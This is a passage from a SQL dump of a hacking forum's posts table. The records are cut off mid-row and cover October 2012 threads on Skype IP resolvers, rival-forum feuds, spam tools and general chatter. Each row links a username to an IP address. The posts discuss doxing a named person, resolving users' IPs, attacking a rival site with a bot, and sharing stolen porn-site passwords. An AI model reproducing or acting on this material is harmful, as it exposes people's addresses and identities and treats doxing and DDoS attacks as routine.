'912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '3', '??????????¢™', '1350450027', 'I will not do anything to their site unless they do something to LH.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'd02326174fd3a187207808d83fd182e7', '0', '0'); INSERT INTO mybb_posts VALUES('5032', '907', '5012', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350450092', '[quote=\'t3h jok3r\' pid=\'5012\' dateline=\'1350448176\']\r\nYo this shit live. I posted on ma Facebook.\r\n[/quote]\r\n\r\nLOL Thanks man I appreciate it.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'bcf6500f3f302fd9e7a5badf8eb1edb0', '0', '0'); INSERT INTO mybb_posts VALUES('5033', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '3', '??????????¢™', '1350450258', 'The site doesnt load for me.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'cb035439c5cc085771388d22edac82cc', '0', '0'); INSERT INTO mybb_posts VALUES('5034', '910', '5021', '49', 'RE: Referral Contest?', '0', '3', '??????????¢™', '1350450327', 'This would be a great thing but who is going to provide the prize. J0ker cant because he doesnt have money and when he gets some he will need it for the hosting.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '684059e4d2f8737d764b431dcde2fe37', '0', '0'); INSERT INTO mybb_posts VALUES('5035', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '222', 'Exposé', '1350450527', 'Yeh sorry bro...not working for me', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '5f6ab6d11159fde13f9d11479ac5f384', '0', '0'); INSERT INTO mybb_posts VALUES('5036', '909', '5014', '19', '[Junk]Give me HF rep pl0x...', '0', '1', 't3h jok3r', '1350450592', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('5037', '910', '5021', '49', 'RE: Referral Contest?', '0', '222', 'Exposé', '1350450603', 'Lol I can provide a small cash prize...like 20$ or so...but what if I win lmao', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '42ae9d7fe7dd0adffbf0e559f68d18e2', '0', '0'); INSERT INTO mybb_posts VALUES('5038', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '1', 't3h jok3r', '1350450646', 'Yeah for advertising but Omni forgot that I once saved him from $200 loss.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd60ffd38fd75a06476b9c42b31cf1b5a', '0', '0'); INSERT INTO mybb_posts VALUES('5039', '912', '5030', '7', 'RE: Woah Awesome. Something you should check.', '0', '1', 't3h jok3r', '1350450723', '[quote=\'ƒ???????????g\' pid=\'5030\' dateline=\'1350449466\']\r\nThis thread should be closed. We should not start this threads and retaliate. Jok3r should handle this with AF.\r\n[/quote]\r\n\r\nI tried but the owner likes being a baby and tries to reach the sky so I\'m leaving it on LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1042af726816f0c4173fe59443bfe7dc', '0', '0'); INSERT INTO mybb_posts VALUES('5040', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '222', 'Exposé', '1350450985', 'Lol alright...I guess :P......', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b35f7b6f8cf734e09ef20e397c64a303', '0', '0'); INSERT INTO mybb_posts VALUES('5041', '914', '0', '7', 'Advertise on Pasteheaven!', '0', '222', 'Exposé', '1350451233', 'Make sure you guys check out http://pasteheaven.com. I started a paste called L33thacking.com. Make sure you guys register and bump it. It might go to the top or something. Not sure :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '460a968312ca7fcc16e92c776a5c6aba', '0', '0'); INSERT INTO mybb_posts VALUES('5042', '43', '105', '7', 'RE: How did you find us?', '0', '228', 'VirtualLegend', '1350451316', 'Brought here By The Joker, Thanks for letting me join this awesome forum', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '8b02ea4cab403ca2e6ba3e82e1dfb532', '0', '0'); INSERT INTO mybb_posts VALUES('5043', '915', '0', '7', 'PasteIT AIO - By ƒ???????????g', '0', '222', 'Exposé', '1350454860', 'Nothing complex but...Decided to make this quick in order for you guys to be able to advertise on pasteheaven....I will make one for pastebin soon....\r\n\r\nScreenshots:\r\n\r\n[img]http://new.tinygrab.com/65dd32dbe5f3273f2e769e69fc2e3c0a4b4bfd84a4.png[/img]\r\n\r\n[img]http://new.tinygrab.com/65dd32dbe5dcdd743fc759fccf505a397797abf673.png[/img]\r\n\r\nWhat you have to do:\r\n\r\n1) Just click the advertise button\r\n2) Check http://pasteheaven.com after and check if it worked\r\n\r\nSourcecode:\r\n\r\n[color=#FF0000]Pm me if you want the sourcecode...[/color]\r\n\r\nDownload the program here : http://www.2shared.com/file/oiB-xCAf/setup.html (and yes its a setup.exe file which is what the compiler for visual studio makes)\r\n\r\n[size=medium][color=#32CD32]Don\'t run the program too much cause they will probably delete the pastes or ban the name...or implement a captcha system. And they can\'t track you because they dont keep ip logs....so we dont need proxies :D[/color][/size]', '74.76.76.132', '1246514308', '1', '0', '222', '1350495461', '1', '04634bbb9cc089a5940a123b144c85c9', '0', '1350495461'); INSERT INTO mybb_posts VALUES('5044', '126', '315', '15', 'RE: Adf.ly Bot', '0', '222', 'Exposé', '1350455914', 'Wait do you know jlim....I was on TBN and I know him :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'dad896b3d7723a90bee0485cfd5e386d', '0', '0'); INSERT INTO mybb_posts VALUES('5045', '126', '315', '15', 'RE: Adf.ly Bot', '0', '257', 'XxTREYZxX', '1350456807', 'thanks for the great share and keep up the good work as you always do :)', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '0cd7d9d05ec5a1dc97900a3b1b2600ed', '0', '0'); INSERT INTO mybb_posts VALUES('5046', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '257', 'XxTREYZxX', '1350457226', 'yeah ill do anything to help LH :)', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '86b29d3133fe462b48847c8e585faaf1', '0', '0'); INSERT INTO mybb_posts VALUES('5047', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '53', 'sirchamp', '1350460098', 'I have my own skype resolver. You can send the usernamme of the guy you want to resolve. I will resolve him For free ;)', '91.112.114.162', '1534096034', '1', '0', '0', '0', '1', '705032e202d6350d1af60cc9ca8ca94e', '0', '0'); INSERT INTO mybb_posts VALUES('5048', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '53', 'sirchamp', '1350460244', 'I will when I\'m back home buy.the truboot. So.I can attack them with truboot. Truboot is he strongest bot on hf', '91.112.114.162', '1534096034', '1', '0', '53', '1350460285', '1', '9f27f23e0c90fa3a4fc23377306cbf50', '0', '1350460285'); INSERT INTO mybb_posts VALUES('5049', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '62', 'R?????zo?', '1350460640', 'Thanks I will use this every now and then :)', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '45727c38a803a325280e5bf1ee7bc82c', '0', '0'); INSERT INTO mybb_posts VALUES('5050', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '62', 'R?????zo?', '1350460674', 'No idea why they are doing this to be honest, AF are a bunch of virgin kids imo.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '8c30b640ea0ce13ac4cc060039464faa', '0', '0'); INSERT INTO mybb_posts VALUES('5051', '914', '5041', '7', 'RE: Advertise on Pasteheaven!', '0', '62', 'R?????zo?', '1350460714', 'will do, thanks for this :)', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '6718c31455e73c114bbdef13281c8c2c', '0', '0'); INSERT INTO mybb_posts VALUES('5052', '899', '5047', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '62', 'R?????zo?', '1350460764', '[quote=\'sirchamp\' pid=\'5047\' dateline=\'1350460098\']\nI have my own skype resolver. You can send the usernamme of the guy you want to resolve. I will resolve him For free ;)\n[/quote]\n\nI think the point here is having a skype resolver for LH members, not your own :P', '149.255.32.228', '-1778442012', '1', '0', '62', '1350463473', '1', '2f0d69de79752b4a7709bd70067ce6d4', '0', '1350463473'); INSERT INTO mybb_posts VALUES('5053', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '62', 'R?????zo?', '1350460857', 'I can post that on HF if you want :)', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'd3cb8fb637e583d1546cd10226b9381b', '0', '0'); INSERT INTO mybb_posts VALUES('5054', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '62', 'R?????zo?', '1350460901', 'Hahaha omg I can\'t stop laughing :DD', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '8141d74b3ba1d10e72bae2433bdeed2b', '0', '0'); INSERT INTO mybb_posts VALUES('5055', '913', '5024', '7', 'RE: Anarchyforums.net - Owner is a well known scammer', '0', '62', 'R?????zo?', '1350460970', 'Their forum is going down because our forum is better and he is just mad :P', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '6e5cef71819e369a176625276426aef5', '0', '0'); INSERT INTO mybb_posts VALUES('5056', '821', '5013', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '62', 'R?????zo?', '1350461026', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5013\' dateline=\'1350448254\']\r\nim thinking what i should post next\r\n[/quote]\r\n\r\nyeah that\'s a good idea :P\r\nI\'m thinking what I should post next too! Oh wait... I posted it', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'b9a94f03bc550dcc0cbdc768ccf44b17', '0', '0'); INSERT INTO mybb_posts VALUES('5057', '896', '4892', '23', 'RE: How to secure your Router', '0', '62', 'R?????zo?', '1350461074', 'Nice tutorial bro, also lol @ first pic :D\nKeep them comming.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'ba3a843280c23bf253583a5da5c2c308', '0', '0'); INSERT INTO mybb_posts VALUES('5058', '832', '4370', '25', 'RE: [News] Windows 8 security flaw', '0', '62', 'R?????zo?', '1350461137', 'I don\'t think I will be using W8, seems like it will be like Vista, full of worthless crap, bugs etc.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '3737537775ceb3efa49f9e83f2206847', '0', '0'); INSERT INTO mybb_posts VALUES('5059', '190', '665', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1350461211', '50 watergate lane\n\nNo idea.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'e2113cc2e2f6ef91e610114afa5b1f6e', '0', '0'); INSERT INTO mybb_posts VALUES('5060', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '62', 'R?????zo?', '1350461301', 'I think I will pass, I\'m like the only one who lives in Europe and whenever I wake up I get spammed with 400 messages from 5hours ago :P\nSo it\'s kinda useless for me.', '149.255.32.228', '-1778442012', '1', '0', '62', '1350461320', '1', '11f4c5066eed8f884dff18732a54f239', '0', '1350461320'); INSERT INTO mybb_posts VALUES('5061', '908', '4999', '54', '[17OCT]bangbros,mofos,pornpros,realitykings,vivid,naughtyamerica,brazzers and many', '0', '62', 'R?????zo?', '1350461363', 'thanks for contributing :)\r\nkeep it up', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'c3b70f4ea82dd56bcd63d31231198b94', '0', '0'); INSERT INTO mybb_posts VALUES('5062', '50', '132', '12', 'RE: [tut]How to DOX', '0', '62', 'R?????zo?', '1350461447', 'Nice guide, I will give it a try.\nI only knew about spokeo.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '17cddae4f09d0bf4bd76eaf4086aa6d3', '0', '0'); INSERT INTO mybb_posts VALUES('5063', '905', '4966', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '62', 'R?????zo?', '1350461566', 'Hope he gets arrested, she was innocent.\nHe just abused her basicly.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'f06e76e5655b76ad66d420025a0b8fe9', '0', '0'); INSERT INTO mybb_posts VALUES('5064', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '62', 'R?????zo?', '1350461611', 'yeah seems like NXK\'s one.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'a4b1296709c8328161484de884c29bdb', '0', '0'); INSERT INTO mybb_posts VALUES('5065', '839', '4389', '54', '13.OKT]Brazzers,Bangbros,RK,...and more HUGE MIXXX OF WORKING PASSES FOR 13.OKT.2012', '0', '62', 'R?????zo?', '1350461682', 'Thanks for the list bro.\r\nKeep them coming :)', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'f2fca7596cd3a6bff713c152af4736f4', '0', '0'); INSERT INTO mybb_posts VALUES('5066', '916', '0', '3', 'Subject too long', '0', '62', 'R?????zo?', '1350461871', 'So when a trhead subject is big with the 85 characters and whenever you try to reply you get this message:\r\n\r\n[img]http://i.imgur.com/Cx59N.png[/img]\r\n\r\nBecause it add the \"RE: \" before the subject whenever you try to reply that\'s more 4 characters and becomes annoying because you can\'t use quick reply then.\r\nCan you please limit the thread subject to reply to 90 or something.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'c3c991cbccce1b3eb83f5af6b0de18ab', '0', '0'); INSERT INTO mybb_posts VALUES('5067', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '62', 'R?????zo?', '1350461932', 'yeah NASA gets hacked all the time, I don\'t know why they don\'t put effort in security that sht.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'c8abaaed726cfff04820741cab007843', '0', '0'); INSERT INTO mybb_posts VALUES('5068', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350462149', 'http://www.youtube.com/watch?v=VBAU26tN69M&feature=g-all-u', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '8ec9fc14d2afad6ba207cdba6d26d128', '0', '0'); INSERT INTO mybb_posts VALUES('5069', '899', '5052', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '53', 'sirchamp', '1350462914', '[quote=\'R?????zo?\' pid=\'5052\' dateline=\'1350460764\']\r\n[quote=\'sirchamp\' pid=\'5047\' dateline=\'1350460098\']\r\nI have my own skype resolver. You can send the usernamme of the guy you want to resolve. I will resolve him For free ;)\r\n[/quote]\r\n\r\nI think the point here is having a skype resolver of LH members, not your own :P\r\n[/quote]\r\nYour post doesn\'t make sense..', '91.112.114.162', '1534096034', '1', '0', '0', '0', '1', 'ecf77ef96a2792bee28b452cf4820c50', '0', '0'); INSERT INTO mybb_posts VALUES('5070', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '62', 'R?????zo?', '1350463463', 'well what I mean is the point of this thread is having a skype resolver for LH members, not having you resolve each one if anyone wants.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'd1a82f3df08daf9f5fddf54aae70e0e0', '0', '0'); INSERT INTO mybb_posts VALUES('5071', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '53', 'sirchamp', '1350464649', 'Well I wont give mine. Free skype resolvers are rare. I was lucky to find one.', '91.112.114.162', '1534096034', '1', '0', '0', '0', '1', '5d5b9559de62536053b42c80309351d7', '0', '0'); INSERT INTO mybb_posts VALUES('5072', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '257', 'XxTREYZxX', '1350466496', 'yeah maybe i should hack N.A.S.A if its thats easy lol its probably not but the password is probably POO HAH LOL', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '24cd080a1a60400ee9f2baf3e54bafd7', '0', '0'); INSERT INTO mybb_posts VALUES('5074', '896', '4892', '23', 'RE: How to secure your Router', '0', '264', 'D?ea', '1350469517', 'Thanks everybody!\nI loves to start my tutorials with a bit of fun, and then go over to serious.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '264fe72393e2f6d7f52f16314f8575ca', '0', '0'); INSERT INTO mybb_posts VALUES('5075', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '264', 'D?ea', '1350469601', 'Thanks everybody for the great welcome!', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'd9e8edf5302197a2556cbd38ee54d8d8', '0', '0'); INSERT INTO mybb_posts VALUES('5076', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '264', 'D?ea', '1350469758', 'You should hack NASA, and put up a whitehat deface page, offering to help them securing safety.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '5e69806af2754332ab9bbd9adb77e829', '0', '0'); INSERT INTO mybb_posts VALUES('5077', '916', '5066', '3', 'RE: Subject too long', '0', '264', 'D?ea', '1350469828', 'This is a common error, and can easy get fixed.\nIf admin / owner needs help, feel free to PM me.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '98261db4c08171bc3f32c79c76bfe608', '0', '0'); INSERT INTO mybb_posts VALUES('5078', '832', '5058', '25', 'RE: [News] Windows 8 security flaw', '0', '205', 'mothered', '1350470741', '[quote=\'R?????zo?\' pid=\'5058\' dateline=\'1350461137\']\r\nI don\'t think I will be using W8, seems like it will be like Vista, full of worthless crap, bugs etc.\r\n[/quote]\r\n\r\nWindows 8 Is very stable, and It\'s overall functionality Is very responsive.\r\n\r\nThere\'s security flaws In every O/S, but that doesn\'t render It as being crap.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5336300a82ad5c803bb5f9b12497b27d', '0', '0'); INSERT INTO mybb_posts VALUES('5079', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '264', 'D?ea', '1350470807', 'Maybe I should start doing Journey.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'e721c9ea10dcc37a7b284b1cea4f1562', '0', '0'); INSERT INTO mybb_posts VALUES('5080', '916', '5066', '3', 'RE: Subject too long', '0', '205', 'mothered', '1350471069', 'I\'ve experienced the same thing, not only on this forum, but on others too.\r\n\r\nIt\'ll be Interesting to know exactly what the cause Is.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4717e250842931512ce36fda815a41a8', '0', '0'); INSERT INTO mybb_posts VALUES('5081', '913', '5024', '7', 'RE: Anarchyforums.net - Owner is a well known scammer', '0', '205', 'mothered', '1350471245', 'I\'ve never come across that forum before.\r\n\r\nJust for a laugh, I\'ll check It out.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'bc1bb5da7196a58594de31051bdc7ddb', '0', '0'); INSERT INTO mybb_posts VALUES('5082', '893', '4981', '77', 'RE: GamerTag Availability Checker Site', '0', '100', '??zg???g????61', '1350471578', '[quote=\'GlowingCapes\' pid=\'4981\' dateline=\'1350438661\']\r\nThanks! Just found out if my next gamertag name-change is available.. it is. ;)\r\n[/quote]\r\n\r\n;D Glad I could help.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '90697641662310769888617fd6d5c084', '0', '0'); INSERT INTO mybb_posts VALUES('5083', '916', '5080', '3', 'RE: Subject too long', '0', '264', 'D?ea', '1350471727', '[quote=\'mothered\' pid=\'5080\' dateline=\'1350471069\']\r\nI\'ve experienced the same thing, not only on this forum, but on others too.\r\n\r\nIt\'ll be Interesting to know exactly what the cause Is.\r\n[/quote]\r\nIt\'s because when a thread got the maximum 85 char\'s in subject. When you reply it automaticly adds RE: in front of it = the 85 char limit get\'s in use.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '533cc525014b903169eddb7da1019be6', '0', '0'); INSERT INTO mybb_posts VALUES('5084', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '100', '??zg???g????61', '1350471987', 'Yeah I\'m afraid I\'m getting the same error as Jok3r and Relodzor', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '9c86ddf9379129eec0b827fb26166144', '0', '0'); INSERT INTO mybb_posts VALUES('5085', '905', '4966', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '100', '??zg???g????61', '1350472075', 'Hes like us in the perspective that he is a talented Social Engineer except he took his SE\'ing to a whole new level. Thats sick.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'f774d444de1b2f9689ca7a558ab00cd5', '0', '0'); INSERT INTO mybb_posts VALUES('5086', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '100', '??zg???g????61', '1350472223', 'It just says \"IP Resolved: \" With no IP following.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '34eeb809562c19f6b0686d4026bd863d', '0', '0'); INSERT INTO mybb_posts VALUES('5087', '917', '0', '7', 'Please help me', '0', '264', 'D?ea', '1350472978', 'http://kingofweb.com/users/nerdslegend\r\n Please go vote for me, you can vote 10 times for me a day, and it can help me improve my YouTube channel ALOT!', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '276aea4db2ac867797e9060b67d97cb7', '0', '0'); INSERT INTO mybb_posts VALUES('5088', '918', '0', '65', 'I feel famous', '0', '264', 'D?ea', '1350473034', 'Hello guys, I have uploaded this video to YouTube: http://www.youtube.com/watch?v=mIhiKMRM0xQ\n\nIt did get stucked at 317 views after 5 minutes, and it is just growing 12 hours after upload it is stucked at 33k views! - It will soon update again, and I can\'t wait!\n\n[video=youtube]http://www.youtube.com/watch?v=mIhiKMRM0xQ[/video]', '178.157.194.171', '-1298283861', '1', '0', '264', '1350473052', '1', '4a856fe9121489cdc79687879a1d3fef', '0', '1350473052'); INSERT INTO mybb_posts VALUES('5089', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1350474900', 'Thanks for the feedback :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89a64ead9e1f0bbdcd3d234c5747c6ae', '0', '0'); INSERT INTO mybb_posts VALUES('5090', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '82', 'iTzIpod', '1350474941', 'Your avatar image is broken. Or, it\'s just me...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '62ecc61835a680ab63dd17033c839a9a', '0', '0'); INSERT INTO mybb_posts VALUES('5091', '910', '5021', '49', 'RE: Referral Contest?', '0', '82', 'iTzIpod', '1350474985', 'You host it, you can\'t participate in it. :p\n\n\nI don\'t know. There was one a while ago. But I won it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '028d055ffbe7b94e7632e4ec4822cff0', '0', '0'); INSERT INTO mybb_posts VALUES('5092', '43', '105', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1350475015', 'Welcome to the forums everyone.\n\n\n\n^ t3h jok3r. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '32d5c363a63a199f873cdcfddae9c760', '0', '0'); INSERT INTO mybb_posts VALUES('5093', '126', '315', '15', 'RE: Adf.ly Bot', '0', '82', 'iTzIpod', '1350475124', 'Wait so this works 100% virus free?\n\nAnd should I run it in Sandboxie?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1cb3939114659c0715e65356487fccc8', '0', '0'); INSERT INTO mybb_posts VALUES('5094', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '82', 'iTzIpod', '1350475182', 'Best video on Youtube.\n\nHer interview reaction:\nIt was like Mortal Kombat. And it hurt. \n\n\nOr something along those lines :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '874b5746d5a00965ac13abc3a993abe0', '0', '0'); INSERT INTO mybb_posts VALUES('5095', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '67', 'HoverCatz', '1350475251', 'May i have this? .', '193.161.89.201', '-1046390327', '1', '0', '0', '0', '1', '2dae2f70b5da450b88cfd9a86b3b5f3e', '0', '0'); INSERT INTO mybb_posts VALUES('5096', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '61', 'NXK', '1350475280', 'It says demo in the title.. It\'s not suposed to work.. All i said was it may work..', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '930e55a0a9df0c3c6b878b82fffb044d', '0', '0'); INSERT INTO mybb_posts VALUES('5097', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '2', 'Apathy', '1350475873', 'I would like this thanks. :P', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '212280f3a5e5a7a3281edaa78c34ad49', '0', '0'); INSERT INTO mybb_posts VALUES('5098', '910', '5021', '49', 'RE: Referral Contest?', '0', '2', 'Apathy', '1350476021', 'It could be a collective of people pitching in for the prizes. The more people the more money.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', 'c2b4d8fc4c4d21d6e909bfd684e14dba', '0', '0'); INSERT INTO mybb_posts VALUES('5099', '919', '0', '7', '[Free] Custom Mousepad - Only $1 with free shipping', '0', '264', 'D?ea', '1350477472', '[align=center][b][size=large]This is 100% legit, and is not on anyway grey or blackhat.[/size][/b]\r\n\r\n\r\n[b]First of all, create an account on:[/b] http://www.artscow.com/\r\n\r\n[b]When you\'ve got an account go to:[/b] http://www.artscow.com/photo-gifts/mousepad/large-mousepad-160 - [i]And create your custom mousepad.[/i]\r\n\r\n[b]When you have created it, checkout and then there will be a place saying discount codes, or something similar, type in this code:[/b] [u]Z099PLAYVJVGY[/u] - [i]Now the price will be lowered to only $1 and free shipping![/i]\r\n\r\n[/align]', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '8538f272ded77b6eda1197215aa1d2a5', '0', '0'); INSERT INTO mybb_posts VALUES('5100', '905', '4966', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '67', 'HoverCatz', '1350480100', 'New info: http://pastebin.com/X4pd8bLM, http://pastebin.com/L0FfyFK1', '193.161.89.204', '-1046390324', '1', '0', '67', '1350480183', '1', '415c2ec357f6af0a441af2d5d6723ce1', '0', '1350480183'); INSERT INTO mybb_posts VALUES('5101', '916', '5083', '3', 'RE: Subject too long', '0', '62', 'R?????zo?', '1350482342', '[quote=\'D?ea\' pid=\'5083\' dateline=\'1350471727\']\r\n[quote=\'mothered\' pid=\'5080\' dateline=\'1350471069\']\r\nI\'ve experienced the same thing, not only on this forum, but on others too.\r\n\r\nIt\'ll be Interesting to know exactly what the cause Is.\r\n[/quote]\r\nIt\'s because when a thread got the maximum 85 char\'s in subject. When you reply it automaticly adds RE: in front of it = the 85 char limit get\'s in use.\r\n[/quote]\r\n\r\nexactly, should be easy to fix though.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '19cfbfb1af611e515e570973af0bc55f', '0', '0'); INSERT INTO mybb_posts VALUES('5102', '918', '5088', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350482413', 'Is that you btw?\nI\'ve no idea :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e815524f9fbd309a2ee6c05e7550aaf2', '0', '0'); INSERT INTO mybb_posts VALUES('5103', '918', '5102', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350482732', '[quote=\'R?????zo?\' pid=\'5102\' dateline=\'1350482413\']\r\nIs that you btw?\r\nI\'ve no idea :P\r\n[/quote]\r\nIt\'s my channel, yes.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'd71ee17d50ec281e9ac30dd61af4d47b', '0', '0'); INSERT INTO mybb_posts VALUES('5104', '919', '5099', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '61', 'NXK', '1350487977', 'Probably going to make a nyan cat one, TY OP.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '97292de2a50277ff06d92b42599c4ff6', '0', '0'); INSERT INTO mybb_posts VALUES('5105', '900', '5090', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '228', 'VirtualLegend', '1350488218', '[quote=\'iTzIpod\' pid=\'5090\' dateline=\'1350474941\']\r\nYour avatar image is broken. Or, it\'s just me...\r\n[/quote]\r\n\r\nYour right his image is broken', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e8e23a743226c112b25ea6abf6e72bbe', '0', '0'); INSERT INTO mybb_posts VALUES('5106', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '53', 'sirchamp', '1350488587', 'I also live in Europe. My skype = marco.phono1', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '7279b90acd6babb67f9835a4d02dc225', '0', '0'); INSERT INTO mybb_posts VALUES('5107', '919', '5104', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '264', 'D?ea', '1350489700', '[quote=\'NXK\' pid=\'5104\' dateline=\'1350487977\']\r\nProbably going to make a nyan cat one, TY OP.\r\n[/quote]\r\nCould be awesome.\r\nOr a Gangnam Style - LOL.\r\n\r\nI got one with Anonymous ;)\r\nOne with this picture: http://www.imgbase.info/images/safe-wallpapers/miscellaneous/qutote/15168_qutote_anonymous_i_am_free.jpg', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'd7260965734da2a7cf81b2cd9fa96c83', '0', '0'); INSERT INTO mybb_posts VALUES('5108', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '264', 'D?ea', '1350489756', 'NerdsLegend - please add me.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '785c18af59ed7edde4fcd5e8015afc02', '0', '0'); INSERT INTO mybb_posts VALUES('5109', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '264', 'D?ea', '1350489888', 'Can I get one please?\nIt could be awesome if it had a bit of \'nerd\' style over it ;)\n\n-THANKS!', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '889ee253ed7fe96f5e0c8cf0f69b2a8b', '0', '0'); INSERT INTO mybb_posts VALUES('5110', '900', '5008', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '228', 